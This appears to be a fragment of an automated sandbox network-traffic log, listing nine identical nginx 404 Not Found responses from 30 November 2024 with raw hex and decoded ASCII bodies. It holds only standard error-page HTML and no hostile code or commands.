                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:47 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:50 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:57:54 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:58:13 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:58:18 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:58:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:58:26 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 30 Nov 2024 00:58:33 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
